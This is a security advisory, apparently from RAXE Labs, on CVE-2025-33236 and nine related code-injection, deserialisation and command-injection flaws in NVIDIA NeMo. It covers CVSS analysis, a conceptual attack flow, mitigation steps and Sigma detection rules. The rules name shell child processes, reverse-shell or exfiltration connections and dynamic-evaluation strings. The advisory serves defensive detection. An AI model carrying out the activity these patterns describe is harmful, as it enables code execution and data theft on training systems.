RAXE-2026-024 HIGH CVSS 7.8 v3.1 S3

NVIDIA NeMo Framework Code Injection (CVE-2025-33236)

Supply Chain 2026-03-09 M. Hirani TLP:GREEN
CVE-2025-33236 CVE-2025-33241 CVE-2025-33243 CVE-2025-33245 CVE-2025-33246 CVE-2025-33249 CVE-2025-33250 CVE-2025-33251 CVE-2025-33252 CVE-2025-33253

Executive Summary

What: A high-severity code injection vulnerability (CVE-2025-33236, CVSS 7.8) exists in NVIDIA's NeMo Framework, an open-source platform for generative AI model training and deployment (NVD). Maliciously crafted data processed by NeMo versions prior to 2.6.1 can trigger arbitrary code execution, privilege escalation, information disclosure, and data tampering (NVD). The vulnerability was reported by Inga Cherny from Cato CTRL (NVIDIA Acknowledgements).

So What: CVE-2025-33236 is one of ten high-severity vulnerabilities disclosed simultaneously in the February 2026 NVIDIA NeMo security bulletin, comprising four code injection flaws (CWE-94), four deserialisation vulnerabilities (CWE-502), and two command injection flaws (CWE-77) (NVIDIA Advisory a_id/5762). This batch disclosure follows two prior NeMo security bulletins in November and December 2025 that addressed an additional four high-severity code injection and deserialisation flaws (NVIDIA Advisories a_id/5718, a_id/5736). The concentration of input validation and code evaluation weaknesses across multiple NeMo releases suggests a systemic pattern in the framework's data handling pathways (RAXE assessment based on CWE distribution across the three NVIDIA bulletins). The local attack vector (AV:L) with low-privilege requirement (PR:L) means that organisations operating shared ML training infrastructure -- where multiple users can submit training data or configuration files -- should assess their exposure to this vulnerability (NVD CVSS vector; risk characterisation is RAXE assessment).

Now What: Upgrade NVIDIA NeMo Framework to version 2.6.1 or later immediately. Version 2.6.1 was released on 9 January 2026 on PyPI (PyPI: nemo-toolkit). Audit all ML training pipelines that ingest external data through NeMo for potential exposure. Review the remaining nine CVEs in the same bulletin for additional risk in your environment (NVIDIA Advisory a_id/5762).

Risk Rating

Dimension Rating Detail
Severity HIGH (7.8) CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (NVD)
Urgency HIGH Patch available since January 2026 (PyPI: nemo-toolkit 2.6.1); batch of 10 CVEs increases attack surface
Scope UNCHANGED Impact confined to the vulnerable NeMo component (NVD)
Confidence HIGH CVE assigned, NVD analysed, GHSA published (GHSA-f86v-54pm-58q4), vendor advisory issued, patch released (NVD; NVIDIA Advisory a_id/5762)
Business Impact HIGH Arbitrary code execution in ML training infrastructure (NVD: C:H/I:H/A:H); potential for model poisoning, data exfiltration, and training pipeline compromise (RAXE assessment based on NVD impact ratings)

Affected Products

Product Registry Affected Versions Fixed Version Source
nemo-toolkit PyPI All versions prior to 2.6.1 2.6.1 (released 2026-01-09) NVIDIA Advisory a_id/5762; PyPI

Am I Affected?

  • Check if NVIDIA NeMo Framework is installed in any ML training, fine-tuning, or inference environment
  • Verify the installed version: pip show nemo-toolkit -- any version prior to 2.6.1 is within the vulnerable range (NVIDIA Advisory a_id/5762)
  • Review whether external or untrusted data (training datasets, model configurations, checkpoint files) is processed through NeMo pipelines
  • Assess whether low-privilege users can submit training jobs or data to shared NeMo installations

Abstract

CVE-2025-33236 is a high-severity code injection vulnerability (CWE-94) in the NVIDIA NeMo Framework, affecting all versions prior to 2.6.1 (NVD). The flaw allows a local attacker with low-level privileges to craft malicious data that, when processed by the framework, results in code injection leading to code execution (NVD). The CVSS vector (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) indicates that exploitation requires no user interaction and achieves high impact across confidentiality, integrity, and availability (NVD).

This vulnerability was disclosed as part of a batch of ten high-severity CVEs in the February 2026 NVIDIA NeMo security bulletin, which included four CWE-94 code injection flaws, four CWE-502 deserialisation flaws, and two CWE-77 command injection flaws (NVIDIA Advisory a_id/5762). NVIDIA credited Inga Cherny from Cato CTRL as the reporter (NVIDIA Acknowledgements). The fix was released in nemo-toolkit version 2.6.1, available on PyPI since 9 January 2026 (PyPI: nemo-toolkit).

The precise exploitation mechanism -- including the specific NeMo internal function, file format, and injection syntax -- has not been publicly detailed beyond the vendor advisory description. No public proof-of-concept exploit exists at time of writing. All analysis in this publication is derived from the NVD entry, NVIDIA advisory, and CWE-94 pattern inference.

Key Findings

  1. High-severity code injection in NVIDIA NeMo Framework -- CVE-2025-33236 (CWE-94, CVSS 7.8) enables arbitrary code execution within the NVIDIA NeMo Framework process when processing attacker-crafted data (NVD).

  2. Batch disclosure of ten high-severity CVEs -- The February 2026 NVIDIA security bulletin addresses ten vulnerabilities in the NeMo Framework, the largest batch to date. The highest-severity issue in the batch, CVE-2025-33245, carries a CVSS of 8.0 (NVIDIA Advisory a_id/5762).

  3. Systemic input validation weakness pattern -- The ten CVEs span three CWE categories: CWE-94 (code injection, 4 CVEs), CWE-502 (deserialisation of untrusted data, 4 CVEs), and CWE-77 (command injection, 2 CVEs). All share a common theme of insufficient validation of external data before processing (NVIDIA Advisory a_id/5762).

  4. Recurring NeMo security disclosures -- Prior NVIDIA NeMo security bulletins in November 2025 (2 CVEs, fixed in 2.5.0) and December 2025 (2 CVEs, fixed in 2.5.3) addressed similar code injection and deserialisation flaws, bringing the total to at least fourteen high-severity NeMo CVEs across three consecutive bulletins (NVIDIA Advisories a_id/5718, a_id/5736, a_id/5762).

  5. Local attack vector with insider threat relevance -- The CVSS vector specifies local access (AV:L) and low privileges (PR:L) (NVD). Shared ML training environments where multiple users submit training jobs or data to a common NeMo installation represent the most direct exposure scenario for this attack vector (RAXE assessment based on NVD CVSS vector).

Attack Flow

+--------------------------+
|  1. INITIAL ACCESS       |  Attacker has low-privilege local account
|  Low-privilege user      |  on system running NeMo Framework
|  (AV:L, PR:L)           |  (NVD)
+------------+-------------+
             |
             v
+--------------------------+
|  2. PAYLOAD CRAFTING     |  Attacker creates malicious data file
|  Malicious data file     |  (format and field not publicly known)
|  (CWE-94)               |  (NVIDIA Advisory a_id/5762)
+------------+-------------+
             |
             v
+--------------------------+
|  3. DATA DELIVERY        |  Malicious file placed in NeMo
|  Training pipeline       |  processing path (training data,
|  or config path          |  config, or checkpoint -- RAXE assessment)
+------------+-------------+
             |
             v
+--------------------------+
|  4. PROCESSING TRIGGER   |  NeMo Framework processes the
|  No user interaction     |  malicious data during training
|  required (UI:N)         |  or inference job (NVD)
+------------+-------------+
             |
             v
+--------------------------+
|  5. CODE INJECTION       |  Attacker-controlled code is
|  Arbitrary running       |  evaluated by the NeMo process
|  in NeMo process         |  (CWE-94 pattern)
+------------+-------------+
             |
             v
+--------------------------+
|  6. IMPACT               |  Code running (C:H, I:H, A:H)
|  Privilege escalation    |  Information disclosure
|  Data tampering          |  Potential denial of service
|  Scope: Unchanged        |  (NVD)
+--------------------------+

Technical Details

Vulnerability Mechanics

The NVIDIA NeMo Framework contains a code injection flaw classified under CWE-94 (Improper Control of Generation of Code) (NVD). The NVD description states that "malicious data created by an attacker could cause code injection," potentially leading to "code execution, escalation of privileges, information disclosure, and data tampering" (NVD).

(RAXE assessment -- the following describes possible implementation patterns consistent with CWE-94. The specific vulnerable function, file format, and injection syntax for CVE-2025-33236 have not been publicly disclosed by NVIDIA.)

CWE-94 vulnerabilities in Python frameworks typically manifest through one or more of the following patterns (CWE-94 definition):

  • Dynamic code evaluation where user-controlled input reaches functions that interpret strings as runnable code (RAXE assessment)
  • Unsafe use of dynamic import machinery with attacker-controlled module paths (RAXE assessment)
  • Template injection where data fields are interpreted as runnable code rather than data (RAXE assessment)

The NVIDIA advisory states the vulnerability is triggered by "a specially crafted malicious file" (NVIDIA Advisory a_id/5762), suggesting a file-based input path -- likely a configuration file, dataset file, or model artefact processed during a NeMo training or inference job (RAXE assessment). The precise internal NeMo function, file format, and injection syntax have not been publicly disclosed.

CVSS Vector Analysis

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H -- Base Score 7.8 HIGH (NVD)

Metric Value Implication
Attack Vector Local (AV:L) Attacker must have local system access or deliver a file processed locally (NVD)
Attack Complexity Low (AC:L) No special conditions or preparation required beyond crafting the malicious data (NVD)
Privileges Required Low (PR:L) A standard low-privilege account is sufficient; root or admin access is not required (NVD)
User Interaction None (UI:N) Exploitation requires no victim action once the malicious data is in the processing path (NVD)
Scope Unchanged (S:U) Impact is confined to the vulnerable NeMo component (NVD)
Confidentiality High (C:H) Complete information disclosure from the vulnerable process (NVD)
Integrity High (I:H) Data tampering and unauthorised code modification (NVD)
Availability High (A:H) Potential denial of service or resource exhaustion (NVD)

The exploitability sub-score is 1.8 and the impact sub-score is 5.9 (NVD). The EPSS score at time of advisory publication was 0.017% (4th percentile), indicating low observed exploitation probability at that time (FIRST.org EPSS).

Weakness Classification

CWE-94: Improper Control of Generation of Code (Code Injection) (NVD). This weakness class encompasses scenarios where software constructs code segments using externally influenced input but does not neutralise or incorrectly neutralises special elements that could modify the syntax or behaviour of the intended code segment (CWE-94 definition).

Batch Disclosure Context

The February 2026 NVIDIA security bulletin (a_id/5762) addresses ten CVEs simultaneously. The full set is listed below for situational awareness:

CVE ID CVSS CWE Description
CVE-2025-33245 8.0 CWE-502 Malicious data causes remote code execution (NVIDIA Advisory a_id/5762)
CVE-2025-33236 7.8 CWE-94 Code injection from attacker-crafted malicious data (NVD)
CVE-2025-33241 7.8 CWE-502 RCE via maliciously crafted file loading (NVIDIA Advisory a_id/5762)
CVE-2025-33243 7.8 CWE-502 RCE in distributed environments (NVIDIA Advisory a_id/5762)
CVE-2025-33246 7.8 CWE-77 Command injection in ASR Evaluator utility (NVIDIA Advisory a_id/5762)
CVE-2025-33249 7.8 CWE-77 Command injection in voice-preprocessing script (NVIDIA Advisory a_id/5762)
CVE-2025-33250 7.8 CWE-94 Remote code execution (NVIDIA Advisory a_id/5762)
CVE-2025-33251 7.8 CWE-94 Remote code execution (NVIDIA Advisory a_id/5762)
CVE-2025-33252 7.8 CWE-502 Remote code execution (NVIDIA Advisory a_id/5762)
CVE-2025-33253 7.8 CWE-502 RCE via maliciously crafted file (NVIDIA Advisory a_id/5762)

All ten CVEs are fixed in NeMo Framework version 2.6.1 (NVIDIA Advisory a_id/5762).

Prior NeMo Security Bulletins

Bulletin Date CVE Count CWE Types Fixed In Source
a_id/5718 November 2025 2 CWE-94 x2 2.5.0 NVIDIA Advisory a_id/5718
a_id/5736 December 2025 2 CWE-502 x2 2.5.3 NVIDIA Advisory a_id/5736
a_id/5762 February 2026 10 CWE-94 x4, CWE-502 x4, CWE-77 x2 2.6.1 NVIDIA Advisory a_id/5762

The escalating CVE count across consecutive bulletins (2, 2, 10) may reflect increased security research attention on the NeMo Framework rather than deteriorating code quality. However, the persistence of the same weakness categories (CWE-94 and CWE-502) across all three bulletins suggests that earlier fixes addressed individual instances rather than the underlying input validation architecture (RAXE assessment).

Confidence & Validation

Assessment Confidence: High

Aspect Status Detail
Vendor Advisory Confirmed NVIDIA Advisory a_id/5762 published, patch released (NVIDIA Advisory a_id/5762)
CVE Assigned Yes CVE-2025-33236, published 2026-02-18, analysed by NVD (NVD)
GHSA Published Yes GHSA-f86v-54pm-58q4, severity HIGH, status unreviewed (GHSA-f86v-54pm-58q4)
Reporter Credit Confirmed Inga Cherny, Cato CTRL (NVIDIA Acknowledgements)
PoC Available No No public proof-of-concept exists; RAXE PoC is conceptual only (RAXE assessment)
Patch Available Yes nemo-toolkit 2.6.1 on PyPI since 2026-01-09 (PyPI: nemo-toolkit)
Exploited in Wild Not known No reports of active exploitation; not listed on CISA KEV at time of writing (NVD)

Detection Signatures (Formal Rules)

Advisory Limitations Notice

The NVIDIA security advisory and NVD entry provide minimal technical detail about the specific exploitation mechanism -- no vulnerable function, file format, or injection syntax has been publicly disclosed. As a result, all detection rules below are necessarily generic: they target observable system-level behaviours consistent with CWE-94 exploitation rather than signature-matching a known exploit payload. These rules will produce false positives in environments with legitimate NeMo subprocess activity and will require significant tuning. They should be treated as starting points, not production-ready signatures. Rules will require revision once a public exploit or detailed technical analysis becomes available.

Sigma Rule 1 -- Unexpected Child Process Spawned by NeMo Process

Detects shell or interpreter child processes of a NeMo Python process, consistent with CWE-94 post-exploitation behaviour (NVD; CWE-94 definition).

title: Unexpected Shell or Interpreter Child of NVIDIA NeMo Process
id: a1b2c3d4-0001-4000-8000-raxe2026024a
status: experimental
description: >
  Detects a shell interpreter or scripting engine spawned as a direct child of a
  NVIDIA NeMo Framework Python process. This pattern is consistent with CWE-94
  (Code Injection) exploitation of CVE-2025-33236, where attacker-controlled data
  causes arbitrary code running within the NeMo process.
  Rule is advisory-derived; the specific injection vector is not publicly known.
references:
  - https://nvd.nist.gov/vuln/detail/CVE-2025-33236
  - https://nvidia.custhelp.com/app/answers/detail/a_id/5762
tags:
  - attack.t1059
  - cve.2025-33236
  - cwe.94
author: RAXE Labs (M. Hirani)
date: 2026-03-09
logsource:
  category: process_creation
  product: linux
detection:
  selection_parent:
    ParentImage|contains:
      - '/python'
      - '/python3'
  selection_parent_cmdline:
    ParentCommandLine|contains:
      - 'nemo'
      - 'nemo_toolkit'
      - 'nemo-toolkit'
  selection_child:
    Image|endswith:
      - '/bash'
      - '/sh'
      - '/dash'
      - '/zsh'
      - '/ksh'
      - '/python'
      - '/python3'
      - '/perl'
      - '/ruby'
      - '/node'
  condition: selection_parent and selection_parent_cmdline and selection_child
falsepositives:
  - Legitimate NeMo data preprocessing scripts that use subprocess calls
  - Distributed training launchers (torchrun, mpirun) invoked via NeMo entry points
  - Container environment setup scripts co-located with NeMo processes
  - CI/CD pipelines running NeMo training with orchestration wrappers
level: high

Sigma Rule 2 -- Unexpected Network Connection from NeMo Process

Detects outbound network connections from NeMo processes to non-standard ports, consistent with post-exploitation data exfiltration or reverse shell establishment (NVD).

title: Unexpected Outbound Network Connection from NVIDIA NeMo Process
id: a1b2c3d4-0002-4000-8000-raxe2026024b
status: experimental
description: >
  Detects an outbound TCP network connection initiated by a NVIDIA NeMo Framework
  Python process to a port outside the expected set of model registries and training
  coordination ports. This behaviour is consistent with post-exploitation activity
  following CVE-2025-33236 (CWE-94 Code Injection).
  Rule is advisory-derived; no public exploit details confirm this pattern.
references:
  - https://nvd.nist.gov/vuln/detail/CVE-2025-33236
  - https://nvidia.custhelp.com/app/answers/detail/a_id/5762
tags:
  - attack.t1071
  - cve.2025-33236
  - cwe.94
author: RAXE Labs (M. Hirani)
date: 2026-03-09
logsource:
  category: network_connection
  product: linux
detection:
  selection_process:
    Image|contains:
      - '/python'
      - '/python3'
    CommandLine|contains:
      - 'nemo'
      - 'nemo_toolkit'
      - 'nemo-toolkit'
  filter_legitimate_ports:
    DestinationPort:
      - 443
      - 80
      - 8080
      - 29500
      - 29501
  condition: selection_process and not filter_legitimate_ports
falsepositives:
  - NeMo pipelines that connect to custom data stores or internal APIs on non-standard ports
  - Distributed training setups using custom MASTER_PORT values
  - Monitoring or profiling agents that open additional ports during training runs
level: medium

Sigma Rule 3 -- Suspicious File Written to NeMo Working Directories

Detects unexpected file creation in NeMo working directories, consistent with persistence following code injection (NVIDIA Advisory a_id/5762).

title: Unexpected Script Written to NVIDIA NeMo Working Directory
id: a1b2c3d4-0003-4000-8000-raxe2026024c
status: experimental
description: >
  Detects creation of scripts or binaries in directories commonly used by the
  NVIDIA NeMo Framework. The NVIDIA advisory for CVE-2025-33236 states exploitation
  requires a specially crafted malicious file; a file drop following successful code
  injection is consistent with persistence or lateral movement activity.
references:
  - https://nvd.nist.gov/vuln/detail/CVE-2025-33236
  - https://nvidia.custhelp.com/app/answers/detail/a_id/5762
tags:
  - attack.t1105
  - cve.2025-33236
  - cwe.94
author: RAXE Labs (M. Hirani)
date: 2026-03-09
logsource:
  category: file_event
  product: linux
detection:
  selection_directory:
    TargetFilename|contains:
      - '/nemo_experiments/'
      - '/nemo_checkpoints/'
      - '/.cache/huggingface/'
      - '/nemo_datasets/'
      - '/workspace/nemo'
      - '/home/nemo'
      - '/opt/nemo'
  selection_extension:
    TargetFilename|endswith:
      - '.sh'
      - '.py'
      - '.pl'
      - '.rb'
      - '.elf'
      - '.so'
      - '.bin'
  filter_known_nemo_writes:
    TargetFilename|endswith:
      - '.nemo'
      - '.ckpt'
      - '.pt'
      - '.log'
      - '.json'
      - '.yaml'
      - '.txt'
  condition: selection_directory and selection_extension and not filter_known_nemo_writes
falsepositives:
  - Environment setup scripts legitimately placed in NeMo working directories by administrators
  - Custom NeMo plugins or extensions that install Python files to checkpoint directories
  - Automated pipeline scripts that stage preprocessing code alongside NeMo checkpoints
level: medium

Sigma Rule 4 -- Vulnerable nemo-toolkit Version Detected

Configuration-state detection to identify unpatched NeMo installations (NVIDIA Advisory a_id/5762).

title: Vulnerable NVIDIA NeMo Toolkit Version Detected (CVE-2025-33236)
id: a1b2c3d4-0004-4000-8000-raxe2026024d
status: stable
description: >
  Detects invocation of a pip version query for nemo-toolkit. Correlate against process
  output to confirm whether the installed version is prior to 2.6.1, which is the full
  vulnerable range for CVE-2025-33236 (CVSS 7.8 HIGH, CWE-94 Code Injection).
references:
  - https://nvd.nist.gov/vuln/detail/CVE-2025-33236
  - https://nvidia.custhelp.com/app/answers/detail/a_id/5762
tags:
  - attack.t1195
  - cve.2025-33236
  - cwe.94
  - posture
author: RAXE Labs (M. Hirani)
date: 2026-03-09
logsource:
  category: process_creation
  product: linux
detection:
  selection_pip_show:
    CommandLine|contains|all:
      - 'pip'
      - 'show'
      - 'nemo-toolkit'
  condition: selection_pip_show
falsepositives:
  - Security scanning tools legitimately auditing installed packages
  - Administrator-initiated version checks as part of patch verification
level: informational

Sigma Rule 5 -- Dynamic Code Evaluation in NeMo Process Context

Detects Python dynamic evaluation constructs co-located with NeMo module references on the command line, consistent with CWE-94 exploitation (NVD; CWE-94 definition).

title: Suspicious Dynamic Code Evaluation in NVIDIA NeMo Process Context
id: a1b2c3d4-0005-4000-8000-raxe2026024e
status: experimental
description: >
  Detects Python process invocations that combine NVIDIA NeMo module references with
  dynamic code evaluation constructs on the command line. This pattern is consistent
  with CWE-94 (Code Injection) exploitation as classified for CVE-2025-33236.
references:
  - https://nvd.nist.gov/vuln/detail/CVE-2025-33236
  - https://nvidia.custhelp.com/app/answers/detail/a_id/5762
  - https://cwe.mitre.org/data/definitions/94.html
tags:
  - attack.t1059.006
  - cve.2025-33236
  - cwe.94
author: RAXE Labs (M. Hirani)
date: 2026-03-09
logsource:
  category: process_creation
  product: linux
detection:
  selection_python:
    Image|contains:
      - '/python'
      - '/python3'
  selection_nemo_context:
    CommandLine|contains:
      - 'nemo'
      - 'nemo_toolkit'
  selection_dynamic_evaluation:
    CommandLine|contains:
      - '__import__('
      - 'compile('
      - 'importlib'
  condition: selection_python and selection_nemo_context and selection_dynamic_evaluation
falsepositives:
  - Development or notebook environments where analysts pass dynamic patterns as inline test code
  - Automated testing frameworks invoking NeMo with dynamic test harness code
  - Specific NeMo plugin implementations that legitimately use dynamic imports
level: high

Detection Gaps

# Gap Impact Resolution Path
G1 Specific NeMo internal function and code path not publicly known Rules rely on post-exploitation behaviour; may miss novel delivery variants Monitor NVD, NVIDIA GitHub (NVIDIA-NeMo/NeMo), and security research for technical disclosure
G2 File format and field used for injection not identified Rule 3 covers plausible directories but cannot target the exact file type Review NeMo 2.6.1 patch diff on GitHub for the fixed code path
G3 Privilege escalation mechanism not described in advisory No rule covers the escalation step Monitor for CVE technical write-ups
G4 Windows and macOS variants not covered Rules are Linux-only; NeMo also runs on Windows with CUDA Add Windows Sysmon equivalents once attack vector is confirmed
G5 Container and Kubernetes detection absent NeMo is commonly deployed in containerised ML environments Add Falco or container-aware rules once advisory details are clarified
G6 No YARA rule provided File-based scanning requires knowledge of the injection format Defer until G2 is resolved

Detection & Mitigation

Immediate Actions

  1. Upgrade to nemo-toolkit 2.6.1 or later -- This is the primary remediation. Install via PyPI: pip install --upgrade nemo-toolkit (NVIDIA Advisory a_id/5762; PyPI: nemo-toolkit). At time of writing, the latest available version is 2.7.0, released 26 February 2026 (PyPI: nemo-toolkit).

  2. Audit all ten CVEs in the February 2026 bulletin -- Review the full set of vulnerabilities for additional exposure in your environment: CVE-2025-33241, CVE-2025-33243, CVE-2025-33245, CVE-2025-33246, CVE-2025-33249, CVE-2025-33250, CVE-2025-33251, CVE-2025-33252, CVE-2025-33253 (NVIDIA Advisory a_id/5762).

  3. Restrict local access to NeMo training environments -- If an immediate upgrade is not feasible, limit which users can submit training jobs, data, or configuration files to shared NeMo installations.

Detection Guidance

  • Process monitoring -- Deploy Sigma Rules 1 and 5 on hosts running NeMo to detect unexpected child processes and dynamic code evaluation patterns. Requires endpoint telemetry (Sysmon on Windows, auditd or osquery on Linux).
  • File integrity monitoring -- Deploy Sigma Rule 3 to detect unexpected file drops in NeMo working directories. Tune directory paths to match the target environment.
  • Posture scanning -- Use Sigma Rule 4 or an equivalent package audit to identify unpatched NeMo installations across the estate.
  • Network monitoring -- Deploy Sigma Rule 2 to detect anomalous outbound connections from NeMo processes. Define a whitelist of legitimate egress destinations for the environment.

Strategic Recommendations

  • Establish AI/ML framework vulnerability monitoring -- NeMo has had at least fourteen high-severity CVEs across three consecutive security bulletins (November 2025, December 2025, February 2026) (NVIDIA Advisories a_id/5718, a_id/5736, a_id/5762). Include NeMo and comparable frameworks (PyTorch, TensorFlow, Hugging Face Transformers) in your regular vulnerability scanning cycle.
  • Implement integrity checks on training data and model artefacts -- Cryptographic hashing or signing of datasets and checkpoint files processed by NeMo can help detect tampering before processing.
  • Segment ML training infrastructure -- Isolate ML training environments from production networks and sensitive data stores to limit the impact of code running within a training node.
  • Assess insider threat exposure in shared ML environments -- The local attack vector with low-privilege requirements (NVD CVSS vector) is consistent with scenarios where data scientists, ML engineers, or automated pipelines share access to training infrastructure (RAXE assessment).

Indicators of Compromise

Type Indicator Context
Behavioural Process tree: python/python3 (NeMo) spawning unexpected shell (bash, sh, dash) Post-exploitation child process consistent with CWE-94 (NVD)
Behavioural Dynamic import or compile calls on command line co-located with NeMo module references Exploitation trigger pattern (CWE-94 definition)
Behavioural Outbound network connections from NeMo process to non-standard ports Possible data exfiltration or reverse shell -- speculative, not confirmed by advisory (RAXE assessment based on CWE-94 post-exploitation patterns)
File Script or binary files (.sh, .py, .so, .elf) appearing in NeMo working directories (nemo_experiments, nemo_checkpoints, nemo_datasets) Possible persistence artefact following code injection -- speculative, not confirmed by advisory (RAXE assessment based on CWE-94 post-exploitation patterns)
Configuration nemo-toolkit version prior to 2.6.1 installed on any host Vulnerable installation (NVIDIA Advisory a_id/5762)

Note: All behavioural indicators above are advisory-derived inferences from the CWE-94 classification and CVSS impact ratings. No indicators have been validated against a live exploit. The specific injection file format is not publicly known.

Strategic Context

The following observations place the NVIDIA NeMo Framework code injection vulnerability in broader context. All strategic interpretation in this section is RAXE assessment unless otherwise sourced.

AI framework security exposure is increasing (RAXE assessment). The NeMo Framework is used for training and fine-tuning large language models, speech recognition systems, and multimodal AI applications within NVIDIA's AI ecosystem (NVIDIA). As organisations adopt AI/ML infrastructure, the security posture of these frameworks becomes relevant to enterprise risk. A code injection vulnerability in a training framework can compromise model integrity, training data confidentiality, and the computational resources involved (RAXE assessment).

Recurring NeMo CVEs indicate a pattern worth monitoring (RAXE assessment). The three consecutive security bulletins (November 2025, December 2025, February 2026) have disclosed at least fourteen high-severity vulnerabilities in the NeMo Framework, with the February 2026 batch alone addressing ten CVEs (NVIDIA Advisories a_id/5718, a_id/5736, a_id/5762). The persistence of the same weakness categories -- CWE-94 (code injection) and CWE-502 (deserialisation) -- across all three bulletins suggests that the underlying input validation architecture may require structural remediation beyond individual patch fixes (RAXE assessment). Organisations using NeMo should maintain an aggressive patching cadence for this framework (RAXE assessment).

Possible supply chain implications for ML pipelines (RAXE assessment). The local attack vector, combined with the ability to trigger exploitation through malicious data files processed by the framework, creates a potential supply chain risk for organisations that ingest external training data, pre-trained models, or configuration files from third-party sources. This aligns with the broader trend of ML supply chain attacks documented in the MITRE ATLAS framework, where adversaries target model and data pipelines rather than the application layer (RAXE assessment).

Potential regulatory relevance (RAXE assessment). The EU AI Act and comparable regulatory frameworks are establishing requirements for AI system security assessments. Frameworks like NeMo, which process training data and produce models deployed in regulated contexts (healthcare, finance, autonomous systems), may fall under compliance requirements for vulnerability management and supply chain security. The high-severity nature of these vulnerabilities and the batch disclosure pattern are the type of findings that regulatory auditors may scrutinise (RAXE assessment).

References

  1. CVE-2025-33236 -- NVD entry, CVSS 7.8 HIGH, CWE-94 (NVD)
  2. NVIDIA Security Bulletin a_id/5762 -- February 2026 vendor advisory, 10 NeMo Framework CVEs (NVIDIA Advisory a_id/5762)
  3. GHSA-f86v-54pm-58q4 -- GitHub Security Advisory for CVE-2025-33236 (GHSA)
  4. CWE-94: Improper Control of Generation of Code -- MITRE CWE definition
  5. nemo-toolkit on PyPI -- Package registry; version 2.6.1 released 2026-01-09 (PyPI)
  6. NVIDIA Security Bulletin a_id/5718 -- November 2025 vendor advisory, 2 NeMo Framework CVEs (NVIDIA Advisory a_id/5718)
  7. NVIDIA Security Bulletin a_id/5736 -- December 2025 vendor advisory, 2 NeMo Framework CVEs (NVIDIA Advisory a_id/5736)
  8. NVIDIA Product Security Acknowledgements -- Reporter credit: Inga Cherny, Cato CTRL (NVIDIA Acknowledgements)
  9. FIRST EPSS -- Exploit Prediction Scoring System data for CVE-2025-33236